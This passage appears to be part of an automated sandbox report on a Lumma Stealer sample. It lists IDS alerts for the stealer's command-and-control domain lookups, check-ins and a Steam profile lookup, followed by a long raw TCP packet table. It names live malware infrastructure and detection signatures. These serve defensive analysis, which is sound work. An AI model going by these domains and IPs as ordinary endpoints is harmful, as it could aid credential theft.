                                                                                                                                                                                                                                          2024-12-17T09:42:42.435931+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049709104.21.56.70443TCP
                                                                                                                                                                                                                                          2024-12-17T09:42:44.008488+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049715176.113.115.1980TCP
                                                                                                                                                                                                                                          2024-12-17T09:42:47.903636+01002058226ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)1192.168.2.10637421.1.1.153UDP
                                                                                                                                                                                                                                          2024-12-17T09:42:48.126339+01002058222ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)1192.168.2.10584461.1.1.153UDP
                                                                                                                                                                                                                                          2024-12-17T09:42:49.117774+01002058222ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)1192.168.2.10584461.1.1.153UDP
                                                                                                                                                                                                                                          2024-12-17T09:42:51.496307+01002058223ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)1192.168.2.104973645.77.249.79443TCP
                                                                                                                                                                                                                                          2024-12-17T09:42:51.496307+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.104973645.77.249.79443TCP
                                                                                                                                                                                                                                          2024-12-17T09:42:51.498310+01002822521ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner)145.77.249.79443192.168.2.1049736TCP
                                                                                                                                                                                                                                          2024-12-17T09:42:52.466380+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.104973645.77.249.79443TCP
                                                                                                                                                                                                                                          2024-12-17T09:42:52.466380+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.104973645.77.249.79443TCP
                                                                                                                                                                                                                                          2024-12-17T09:42:52.600050+01002058214ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)1192.168.2.10607061.1.1.153UDP
                                                                                                                                                                                                                                          2024-12-17T09:42:53.587292+01002058214ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)1192.168.2.10607061.1.1.153UDP
                                                                                                                                                                                                                                          2024-12-17T09:42:55.294008+01002058215ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)1192.168.2.1049748104.131.68.180443TCP
                                                                                                                                                                                                                                          2024-12-17T09:42:55.294008+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049748104.131.68.180443TCP
                                                                                                                                                                                                                                          2024-12-17T09:42:55.296923+01002822521ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner)1104.131.68.180443192.168.2.1049748TCP
                                                                                                                                                                                                                                          2024-12-17T09:42:55.716435+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1049748104.131.68.180443TCP
                                                                                                                                                                                                                                          2024-12-17T09:42:55.716435+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049748104.131.68.180443TCP
                                                                                                                                                                                                                                          2024-12-17T09:42:55.722626+01002058220ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)1192.168.2.10542621.1.1.153UDP
                                                                                                                                                                                                                                          2024-12-17T09:42:55.979277+01002058218ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)1192.168.2.10577741.1.1.153UDP
                                                                                                                                                                                                                                          2024-12-17T09:42:56.205224+01002058216ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)1192.168.2.10568911.1.1.153UDP
                                                                                                                                                                                                                                          2024-12-17T09:42:56.428498+01002058236ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)1192.168.2.10559671.1.1.153UDP
                                                                                                                                                                                                                                          2024-12-17T09:42:56.659991+01002058210ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)1192.168.2.10515251.1.1.153UDP
                                                                                                                                                                                                                                          2024-12-17T09:42:56.983802+01002058226ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)1192.168.2.10506951.1.1.153UDP
                                                                                                                                                                                                                                          2024-12-17T09:42:58.661848+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049756104.121.10.34443TCP
                                                                                                                                                                                                                                          2024-12-17T09:42:59.448751+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.1049756104.121.10.34443TCP

                                                                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:40.347517014 CET49709443192.168.2.10104.21.56.70
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:40.347579956 CET44349709104.21.56.70192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:40.347652912 CET49709443192.168.2.10104.21.56.70
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:40.358839989 CET49709443192.168.2.10104.21.56.70
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:40.358889103 CET44349709104.21.56.70192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:41.577513933 CET44349709104.21.56.70192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:41.577666044 CET49709443192.168.2.10104.21.56.70
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:41.920531034 CET49709443192.168.2.10104.21.56.70
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:41.920557976 CET44349709104.21.56.70192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:41.920953035 CET44349709104.21.56.70192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:41.921026945 CET49709443192.168.2.10104.21.56.70
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:41.923521996 CET49709443192.168.2.10104.21.56.70
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:41.971332073 CET44349709104.21.56.70192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:42.435955048 CET44349709104.21.56.70192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:42.436018944 CET49709443192.168.2.10104.21.56.70
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:42.436048031 CET44349709104.21.56.70192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:42.436064005 CET44349709104.21.56.70192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:42.436103106 CET49709443192.168.2.10104.21.56.70
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:42.436136961 CET49709443192.168.2.10104.21.56.70
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:42.438535929 CET49709443192.168.2.10104.21.56.70
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:42.438553095 CET44349709104.21.56.70192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:42.438563108 CET49709443192.168.2.10104.21.56.70
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:42.438607931 CET49709443192.168.2.10104.21.56.70
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:42.562268972 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:42.682044983 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:42.682161093 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:42.682439089 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:42.802032948 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008409977 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008429050 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008441925 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008449078 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008487940 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008538008 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008570910 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008583069 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008595943 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008608103 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008614063 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008622885 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008635044 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008641958 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008677006 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.128505945 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.128556967 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.128632069 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.128684998 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.132584095 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.132631063 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.201499939 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.201658010 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.201744080 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.201813936 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.205595016 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.205667019 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.205739975 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.205787897 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.212692022 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.212795019 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.215758085 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.215806961 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.215845108 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.215887070 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.225332022 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.225413084 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.225595951 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.225724936 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.232606888 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.232665062 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.232671976 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.232718945 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.243700981 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.243716002 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.243793011 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.250142097 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.250155926 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.250226974 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.259577036 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.259589911 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.259624958 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.259641886 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.266458988 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.266549110 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.266700029 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.266747952 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.274924994 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.274976969 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.275074959 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.275121927 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.282274008 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.282346964 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.283030987 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.283068895 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.321438074 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.321546078 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.392358065 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.392384052 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.392477036 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.394929886 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.394942999 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.394975901 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.394993067 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.399538994 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.399589062 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.401205063 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.401247025 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.401546001 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.401582956 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.406517982 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.406533003 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.406575918 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.411043882 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.411113024 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.411298990 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.411356926 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.415750980 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.415834904 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.415899992 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.415949106 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.420262098 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.420329094 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.420348883 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.420389891 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.425195932 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.425208092 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.425285101 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.430181980 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.430205107 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.430234909 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.430270910 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.433928013 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.433994055 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.434232950 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.434278965 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.438474894 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.438551903 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.438643932 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.438688040 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.443046093 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.443114042 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.443146944 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.443192005 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.447638988 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.447705030 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.447746038 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.447788954 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.452270031 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.452306032 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.452338934 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.452363968 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.455919981 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.455956936 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.455990076 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.456015110 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.459573030 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.459651947 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.459721088 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.459794998 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.463386059 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.463476896 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.463707924 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.463762045 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.467171907 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.467231989 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.467354059 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.467394114 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.471821070 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.471836090 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.471878052 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.471904993 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.474483013 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.474497080 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.474538088 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.474553108 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.478287935 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.478302956 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.478354931 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.478382111 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.481940985 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.481955051 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.482024908 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.482053041 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.512140036 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.512234926 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.512279987 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.512331963 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.584521055 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.584598064 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.584690094 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.584738016 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.585961103 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.586010933 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.586097002 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.586147070 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.588815928 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.588886023 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.588939905 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.588984966 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.591624022 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.591670990 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.591711044 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.591757059 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.594470024 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.594536066 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.594579935 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.594624996 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.597223997 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.597280979 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.597337008 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.597381115 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.599924088 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.599981070 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.600064993 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.600106955 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.602641106 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.602682114 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.602730036 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.602766991 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.605274916 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.605339050 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.605376959 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.605459929 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.607789040 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.607842922 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.607975960 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.608021021 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.610291958 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.610367060 CET4971580192.168.2.10176.113.115.19
